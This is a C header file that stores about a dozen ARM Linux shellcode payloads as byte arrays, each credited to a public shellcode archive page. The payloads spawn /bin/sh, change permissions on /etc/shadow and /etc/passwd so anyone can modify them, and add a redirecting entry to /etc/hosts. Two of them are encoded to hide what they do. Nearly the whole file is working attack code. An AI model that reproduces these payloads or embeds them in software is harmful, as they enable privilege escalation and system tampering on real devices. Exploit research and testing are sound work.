//
// Copyright (c) 2018 [n/a] info@embeddora.com All rights reserved
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//        * Redistributions of source code must retain the above copyright
//          notice, this list of conditions and the following disclaimer.
//        * Redistributions in binary form must reproduce the above copyright
//          notice, this list of conditions and the following disclaimer in the
//          documentation and/or other materials provided with the distribution.
//        * Neither the name of The Linux Foundation nor
//          the names of its contributors may be used to endorse or promote
//          products derived from this software without specific prior written
//          permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NON-INFRINGEMENT ARE DISCLAIMED.    IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
// OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
// WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// Abstract:            ARM shellcodes as arrays, initialized
//
// Usage:               none
//
// Version:             0.0.8
//
// Make string:         none

#ifndef SHELLCODE_ARM
#define SHELLCODE_ARM

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-904.php
const void *SC_904 =  "\x01\x30\x8f\xe2"
		"\x13\xff\x2f\xe1"
		"\x78\x46\x0e\x30"
		"\x01\x90\x49\x1a"
		"\x92\x1a\x08\x27"
		"\xc2\x51\x03\x37"
		"\x01\xdf\x2f\x62"
		"\x69\x6e\x2f\x2f"
		"\x73\x68";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-901.php
const void *SC_901 =      "\x01\x60\x8f\xe2"
                    "\x16\xff\x2f\xe1"
                    "\x24\x1b"
                    "\x22\x1c"
                    "\xff\x21"
                    "\xff\x31"
                    "\xff\x31"
                    "\xff\x31"
                    "\x05\x31"
                    "\x78\x46"
                    "\x2a\x30"
                    "\x05\x27"
                    "\x01\xdf"
                    "\x14\x22" // movs    r2, $0x14 ; length
                    "\x79\x46"
                    "\x0c\x31"
                    "\x04\x27"
                    "\x01\xdf"
                    "\x24\x1b"
                    "\x20\x1c"
                    "\x01\x27"
                    "\x01\xdf"
                    "\x31\x32\x37\x2e" // 127.
                    "\x31\x2e\x31\x2e" // 1.1.
                    "\x31\x20\x67\x6f" // 1 go
                    "\x6f\x67\x6c\x65" // ogle
                    "\x2e\x6c\x6b\x0a" // .lk
                    "\x2f\x65\x74\x63"
                    "\x2f\x2f\x68\x6f"
                    "\x73\x74\x73";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-853.php
const void *SC_853 =    "\x01\x60\x8f\xe2"    // add  r6, pc, #1
                  "\x16\xff\x2f\xe1"    // bx   r6
                  "\x78\x46"            // mov  r0, pc
                  "\x10\x30"            // adds r0, #16
                  "\xff\x21"            // movs r1, #255    ; 0xff
                  "\xff\x31"            // adds r1, #255    ; 0xff
                  "\x01\x31"            // adds r1, #1
                  "\x0f\x37"            // adds r7, #15
                  "\x01\xdf"            // svc  1
                  "\x40\x40"            // eors r0, r0
                  "\x01\x27"            // movs r7, #1
                  "\x01\xdf"            // svc  1
                  "\x2f\x65\x74\x63"    // .word    0x6374652f
                  "\x2f\x70\x61\x73"    // .word    0x7361702f
                  "\x73\x77"            // .short   0x7773
                  "\x64";               // .byte    0x64

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-854.php
const void *SC_854 =    "\x01\x60\x8f\xe2"    // add  r6, pc, #1
                  "\x16\xff\x2f\xe1"    // bx   r6
                  "\x78\x46"            // mov  r0, pc
                  "\x10\x30"            // adds r0, #16
                  "\xff\x21"            // movs r1, #255    ; 0xff
                  "\xff\x31"            // adds r1, #255    ; 0xff
                  "\x01\x31"            // adds r1, #1
                  "\x08\x27"            // adds r7, #8
                  "\x01\xdf"            // svc  1
                  "\x40\x40"            // eors r0, r0
                  "\x01\x27"            // movs r7, #1
                  "\x01\xdf"            // svc  1
                  "\x2f\x72\x6f\x6f"    // .word    0x6f6f722f
                  "\x74\x2f\x70\x77"    // .word    0x77702f74
                  "\x65\x63"            // .short   0x656e
                  "\x64";               // .byte    0x64

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-668.php
const void *SC_668 =     "\x01\x60\x8f\xe2"   // add   r6, pc, #1
                   "\x16\xff\x2f\xe1"   // bx    r6
                   "\x78\x46"           // mov   r0, pc
                   "\x0c\x30"           // adds  r0, #12
                   "\xff\x21"           // movs  r1, #255
                   "\xff\x31"           // adds  r1, #255
                   "\x0f\x27"           // movs	 r7, #15
                   "\x01\xdf"           // svc   1
                   "\x01\x27"           // movs  r7, #1
                   "\x01\xdf"           // svc   1
                   "/etc/shadow";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-670.php
const void *SC_670=   "\x24\x60\x8f\xe2"     //add r6, pc, #36
		"\x16\xff\x2f\xe1"     //bx r6
		"\xde\x40\xa0\xe3"     //mov r4, #222
		"\x01\x0c\x54\xe3"     //cmp r4, #256
		"\x1e\xff\x2f\x81"     //bxhi lr
		"\xde\x40\x44\xe2"     //sub r4, r4, #222
		"\x04\x50\xde\xe7"     //ldrb r5, [lr, r4]
		"\x02\x50\x85\xe2"     //add r5, r5, #2 (add 2 at every shellcode's byte)
		"\x04\x50\xce\xe7"     //strb r5, [lr, r4]
		"\xdf\x40\x84\xe2"     //add r4, r4, #223
		"\xf7\xff\xff\xea"     //b 8078
		"\xf5\xff\xff\xeb"     //bl 8074
		//shellcode crypted
		"\xff\x5e\x8d\xe0"
		"\x14\xfd\x2d\xdf"
		"\x76\x44"
		"\x0a\x2e"
		"\xfd\x1f"
		"\xfd\x2f"
		"\x0d\x25"
		"\xff\xdd"
		"\xff\x25"
		"\xff\xdd"
		"-cra-qf_bmu";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-671.php
const void * SC_671 = "\x24\x60\x8f\xe2"
                "\x16\xff\x2f\xe1"
                "\xe3\x40\xa0\xe3"
                "\x01\x0c\x54\xe3"
                "\x1e\xff\x2f\x81"
                "\xe3\x40\x44\xe2"
                "\x04\x50\xde\xe7"
                "\x58\x50\x25\xe2"
                "\x04\x50\xce\xe7"
		"\xe4\x40\x84\xe2"
		"\xf7\xff\xff\xea"
		"\xf5\xff\xff\xeb"
		"\x59\x68\xd7\xba"
		"\x4b\xa7\x77\xb9"
		"\x20\x1e\x52\x68"
		"\x59\xc8\x59\xf1"
		"\xca\x42\x53\x7f"
		"\x59\x87\x77\x77"
		"\x3a\x31\x36\x77"
		"\x2b\x30";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-665.php
const void *SC_665 =  "\x01\x30\x8f\xe2"
		"\x13\xff\x2f\xe1"
		"\x78\x46\x0a\x30"
		"\x01\x90\x01\xa9"
		"\x92\x1a\x0b\x27"
		"\x01\xdf\x2f\x2f"
		"\x62\x69\x6e\x2f"
		"\x73\x68";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-698.php
const void *SC_698 =  "\x01\x30\x8f\xe2"
		"\x13\xff\x2f\xe1"
		"\x78\x46\x08\x30"
		"\x49\x1a\x92\x1a"
		"\x0b\x27\x01\xdf"
		"\x2f\x62\x69\x6e"
		"\x2f\x73\x68";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-696.php
const void *SC_696 = 	"\x01\x30\x8f\xe2"
		"\x13\xff\x2f\xe1"
		"\x78\x46\x0c\x30"
		"\xc0\x46\x01\x90"
		"\x49\x1a\x92\x1a"
		"\x0b\x27\x01\xdf"
		"\x2f\x62\x69\x6e"
		"\x2f\x73\x68";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-666.php
const void *SC_666 =  "\x01\x30\x8f\xe2"
		"\x13\xff\x2f\xe1"
		"\x24\x1b\x20\x1c"
		"\x17\x27\x01\xdf"
		"\x78\x46\x0a\x30"
		"\x01\x90\x01\xa9"
		"\x92\x1a\x0b\x27"
		"\x01\xdf\x2f\x2f"
		"\x62\x69\x6e\x2f"
		"\x73\x68";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-820.php
const void *SC_820 =  "\x01\x60\x8f\xe2"
		"\x16\xff\x2f\xe1"
		"\x78\x46"
		"\x12\x30"
		"\xff\x21"
		"\xff\x31"
		"\x01\x31"
		"\x0f\x27"
		"\x01\xdf"
		"\x24\x1b"
		"\x20\x1c"
		"\x01\x27"
		"\x01\xdf"
		"\x2f\x65"
		"\x74\x63\x2f\x73"
		"\x68\x61\x64\x6f"
		"\x77\x00"
		"\xc0\x46";

/// Extracted from: http://shell-storm.org/shellcode/files/shellcode-819.php
const void *SC_819 =	"\x01\x60\x8f\xe2"
		"\x16\xff\x2f\xe1"
		"\x78\x46"
		"\x0a\x30"
		"\x01\x90"
		"\x01\xa9"
		"\x92\x1a"
		"\x0b\x27"
		"\x01\xdf"
		"\x2f\x2f"
		"\x62\x69"
		"\x6e\x2f"
		"\x73\x68\x00\x00";

#endif // #define SHELLCODE_ARM
